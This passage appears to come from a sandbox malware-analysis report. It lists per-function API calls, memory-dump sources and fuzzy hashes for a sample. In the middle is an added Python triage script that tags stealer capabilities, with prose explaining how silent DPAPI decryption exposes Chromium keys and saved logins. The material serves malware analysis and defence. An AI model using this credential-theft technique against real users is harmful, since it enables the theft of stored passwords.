                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: G1F$Mz]$sVx$sVx
                            • API String ID: 0-3723585175
                            • Opcode ID: e141ba6a6a63ceba6f903dfadce0f3f24b91bac4ee0c02c74418fe14bb7e84db
                            • Instruction ID: 895d7be871fb69dc2c7f294f8a24134cfe119da2be028b05c192178388064528
                            • Opcode Fuzzy Hash: e141ba6a6a63ceba6f903dfadce0f3f24b91bac4ee0c02c74418fe14bb7e84db
                            • Instruction Fuzzy Hash: 8342F7F3A0C2049FE704AE2DEC8577ABBE9EF94320F1A463DE6C4C7744E53558058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: cqb$fuo$fuo
                            • API String ID: 0-2515738117
                            • Opcode ID: f1f749dd967cfd6715147d2ae065e26b7436d205c2724c5059c15b1a401bc473
                            • Instruction ID: c2b0d8f34535405a8e9f955d0cbd567f09ba06e4c2fc113e87e2fa78fb4dfe77
                            • Opcode Fuzzy Hash: f1f749dd967cfd6715147d2ae065e26b7436d205c2724c5059c15b1a401bc473
                            • Instruction Fuzzy Hash: 9B52F5F3A0C204AFD7046E29EC8576AFBE5EF94720F1A492DE6C4C7744EA3598018797
                            APIs
                            • CoCreateInstance.COMBASE(0057E118,00000000,00000001,0057E108,00000000), ref: 00573758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005737B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: df16e93cc28027fa94a1b991294918dd137a4b7f47576913475784fb60bb6e9d
                            • Instruction ID: 7b80e93c1e69baa9de096536d71b97b0d2170c9c703f062fbf38ff4138a9bc8d
                            • Opcode Fuzzy Hash: df16e93cc28027fa94a1b991294918dd137a4b7f47576913475784fb60bb6e9d
                            • Instruction Fuzzy Hash: 06410C70A40A289FDB24DB54DC99F9BB7B4BB48702F4081D8E608E72D0E7716E85CF51
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00569B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00569BA3
                            • LocalFree.KERNEL32(?), ref: 00569BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 4b840e52e20ad8ab18d84aa835dff6bc376e3832d61bbb175d1a9f925182db98
                            • Instruction ID: 49265fa9d1993f173521eba87384ff84da47d5f2f4914e39f8d7521a2f69e354
                            • Opcode Fuzzy Hash: 4b840e52e20ad8ab18d84aa835dff6bc376e3832d61bbb175d1a9f925182db98
                            • Instruction Fuzzy Hash: 6011B7B8A00209EFDB04DF94D985AAEB7B9FF89300F108598E915A7350D774AE14CFA1
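The per-function records above (an `APIs` list, a `Memory Dump Source` line and the `Similarity` identifiers) are exactly the data an analyst wants to triage automatically: the `CryptUnprotectData` record with NULL entropy, NULL prompt and flags 0 is the silent DPAPI decrypt a stealer uses on Chromium's encrypted key and saved logins, and the `GetTimeZoneInformation`/`wsprintfA` record is host fingerprinting. The following Python script is an added example, not Joe Sandbox tooling: it parses this listing format from a constructed excerpt built from the records on this page and tags each function with the capability it implies. The capability rules and the reading of the fifth dotted field of the dump id as a Win32 page-protection value (0x40 = PAGE_EXECUTE_READWRITE) are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox per-function listings (added example, not
Joe Sandbox tooling).  Parses "APIs / Memory Dump Source / Similarity"
records into objects and tags API combinations a stealer analyst cares about.
The capability rules and the reading of the fifth dump-id field as a Win32
page-protection value are assumptions of this example."""
import re
from dataclasses import dataclass, field

# Constructed excerpt in the report's own layout: two function records.
SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577A63
• RtlAllocateHeap.NTDLL(00000000), ref: 00577A6A
• GetTimeZoneInformation.KERNEL32(?,?), ref: 00577A7D
• wsprintfA.USER32 ref: 00577AB7
Memory Dump Source
• Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Similarity
• API ID: Heap$AllocateInformationProcessTimeZonewsprintf
• String ID:
• Instruction Fuzzy Hash: 0D1182B1945218EBEB208F54EC49F69BB78FB45711F1087D5E90AA32C0C7785E40CF51
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00569B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00569BA3
• LocalFree.KERNEL32(?), ref: 00569BD3
Memory Dump Source
• Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID:
• Instruction Fuzzy Hash: 6011B7B8A00209EFDB04DF94D985AAEB7B9FF89300F108598E915A7350D774AE14CFA1
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR" (no argument list)
API_CALL = re.compile(r"^•\s+(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
                      r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
# Dump id proc.kind.id.base.protect...: protect is assumed to be a PAGE_* value.
DUMP_ID = re.compile(r"[0-9A-F]{8}\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.")
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)   # (name, module, args, ref)
    api_id: str = ""
    instruction_fuzzy_hash: str = ""
    dump_base: int = 0
    dump_protect: int = 0

    @property
    def api_names(self):
        return {a[0] for a in self.apis}

    @property
    def entry_ref(self):
        return self.apis[0][3] if self.apis else None

def parse_report(text):
    """Split the listing into records; 'Instruction Fuzzy Hash' closes a record."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_CALL.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], m["args"] or "", m["ref"].upper()))
        elif line.startswith("• Source File:"):
            d = DUMP_ID.search(line)
            if d:
                cur.dump_base = int(d["base"], 16)
                cur.dump_protect = int(d["protect"], 16)
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.instruction_fuzzy_hash = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = FunctionRecord()
    return records

# Assumed capability rules: every listed API must appear in the record.
CAPABILITIES = {
    "dpapi_credential_decrypt": {"CryptUnprotectData"},   # Chromium key / login decrypt
    "host_fingerprint_timezone": {"GetTimeZoneInformation", "wsprintfA"},
    "com_instantiation": {"CoCreateInstance"},
}

def classify(rec):
    tags = [name for name, need in CAPABILITIES.items() if need <= rec.api_names]
    if rec.dump_protect in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY):
        tags.append("code_in_rwx_region")   # code that was written at run time (unpacked)
    return tags

def dpapi_call_is_silent(rec):
    """CryptUnprotectData(pDataIn, ppszDescr, pOptionalEntropy, pvReserved,
    pPromptStruct, dwFlags, pDataOut): NULL entropy, NULL prompt and flags 0 means
    any blob protected under the current user decrypts without a prompt."""
    for name, _module, args, _ref in rec.apis:
        if name == "CryptUnprotectData":
            a = [x.strip() for x in args.split(",")]
            return len(a) >= 6 and a[2] == a[4] == a[5] == "00000000"
    return False

def triage(text):
    """Map each record's first API reference address to its capability tags."""
    result = {}
    for rec in parse_report(text):
        tags = classify(rec)
        if "dpapi_credential_decrypt" in tags and dpapi_call_is_silent(rec):
            tags.append("dpapi_silent_user_context")
        result[rec.entry_ref or rec.instruction_fuzzy_hash[:16]] = tags
    return result

if __name__ == "__main__":
    for ref, tags in triage(SAMPLE).items():
        print(ref, ", ".join(tags))
```

Run against a full report export, the `ref` addresses give the places to set breakpoints in the unpacked image (base 0x560000 here), and the `Instruction Fuzzy Hash` values carried in each record can be compared across samples to find the same routine in other builds.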
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Y~w
                            • API String ID: 0-938452142
                            • Opcode ID: 539ff8d87049db22bb888b2faa78eb3f9349d753dc7695bb27ada7fb4019c9ef
                            • Instruction ID: 4fdfd1b4621c599c2a053b4dd55a503ea40b70c4c820edd53cf5423fcd90286b
                            • Opcode Fuzzy Hash: 539ff8d87049db22bb888b2faa78eb3f9349d753dc7695bb27ada7fb4019c9ef
                            • Instruction Fuzzy Hash: 7872D4F360C200AFE3046E29EC8567AFBE9EFD4720F16853DE6C4C7744E63598458696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: q'/{
                            • API String ID: 0-437180505
                            • Opcode ID: f353bcbe6914c3db8daa022174e9a0ea4f2dd2892945c73c8d2fe273243a02bf
                            • Instruction ID: 0794353164a9851997a342d297f661982abaa2f6c2d0f2281d4daeb5293ba960
                            • Opcode Fuzzy Hash: f353bcbe6914c3db8daa022174e9a0ea4f2dd2892945c73c8d2fe273243a02bf
                            • Instruction Fuzzy Hash: 1D4268F360C2049FE708AE28EC8577ABBD6EF94720F1A453DE6C5C7744E93598058687
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %t__
                            • API String ID: 0-598166882
                            • Opcode ID: b9a4e7e119a92880d6691b3a4610e1ee561bdebb9a3740d80efc4cd1eca41414
                            • Instruction ID: d81c3d54c6db7708698420c71f5791ea26b2c83ab0eef811b683713e01f7ac3c
                            • Opcode Fuzzy Hash: b9a4e7e119a92880d6691b3a4610e1ee561bdebb9a3740d80efc4cd1eca41414
                            • Instruction Fuzzy Hash: 5A81C2B3E186104BF3005E39DD8836AB6D6EBD4320F2B463DDACC97784D97A98058786
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 1'k
                            • API String ID: 0-240354404
                            • Opcode ID: befc6766fa986b96f627b4ae432477f3b4146e15e91d78a6ffdf810f5d1ae260
                            • Instruction ID: 27f0e0d3603851e7d2a3a630129f7928032264d598298e75c0f1c64ee62159d7
                            • Opcode Fuzzy Hash: befc6766fa986b96f627b4ae432477f3b4146e15e91d78a6ffdf810f5d1ae260
                            • Instruction Fuzzy Hash: AA418FF3A083189FF3446E28ECD077AB3D9EB94310F1A463DEA8583741F93659058281
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a40ca6b5967beee06ae24aa603f1c1d02c6f00a2cabb1eb9f45a262d9faaf550
                            • Instruction ID: ea56c4790629dff039654c3dac5733b4d52bb747b9ea8ae3dc4e8e8fe9d8e60a
                            • Opcode Fuzzy Hash: a40ca6b5967beee06ae24aa603f1c1d02c6f00a2cabb1eb9f45a262d9faaf550
                            • Instruction Fuzzy Hash: 8E715BF3E183145FE3146E7DDD98726BBDADBD4360F1A463DE588C7388E9B949014282
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7e7e58a6596d515967bc6777e794d4177024c5014818b604e25e28b13270af76
                            • Instruction ID: 47da05140efb0251a112725e722633cfe81f2807d30f79d252c083c3975f3f21
                            • Opcode Fuzzy Hash: 7e7e58a6596d515967bc6777e794d4177024c5014818b604e25e28b13270af76
                            • Instruction Fuzzy Hash: ED710BF3A092049FE304AE2DDC4476AF7EAEBD4721F1A853DD6C483348E97558058697
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 556f9a77e7dd00025854aae95ccad3bafe115b71c3f44942c8d02715d85d01bc
                            • Instruction ID: 02cdc0b508bb9537429d8c6ddb9d346572850df00a9c5092d75939296d49c053
                            • Opcode Fuzzy Hash: 556f9a77e7dd00025854aae95ccad3bafe115b71c3f44942c8d02715d85d01bc
                            • Instruction Fuzzy Hash: 7A7106F3E182104BE3086A2DDC5977ABAD6DBD4720F1B463DDF8997784E9395C028286
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f8a98cea055a4774200730dccc767b7fbced180d2f84d016db01ecec484bf665
                            • Instruction ID: e6b858b47d265ba67a2c4a85af9eb413f07fe60fb03affff95b18c67e9e69951
                            • Opcode Fuzzy Hash: f8a98cea055a4774200730dccc767b7fbced180d2f84d016db01ecec484bf665
                            • Instruction Fuzzy Hash: 625127F3A082045FF354AA6DEC8173BB7D9EB94320F19853DEE94C3784E93D98044296
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4bc4abcd568aeee2d273c9777c8352be9bbf1fc443753ee8b6f1b979bcb1379c
                            • Instruction ID: 1a06b1bb03dd710bbbe17ca40d29c0c949fa5d60098ab38cbd86b6aa4a2f74a6
                            • Opcode Fuzzy Hash: 4bc4abcd568aeee2d273c9777c8352be9bbf1fc443753ee8b6f1b979bcb1379c
                            • Instruction Fuzzy Hash: 78414DF3A181101BF31CA92EDC15776BAD6DBD0324F16823EDB85C77C8EC7A4805869A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 12211658c1501451a36fb3799bd3132ba43d11b85cd5cfeb62d8cca329864380
                            • Instruction ID: 2de905e918f258061688e57dd47d3e377d5f5790074638978c5cfa3c2f74c931
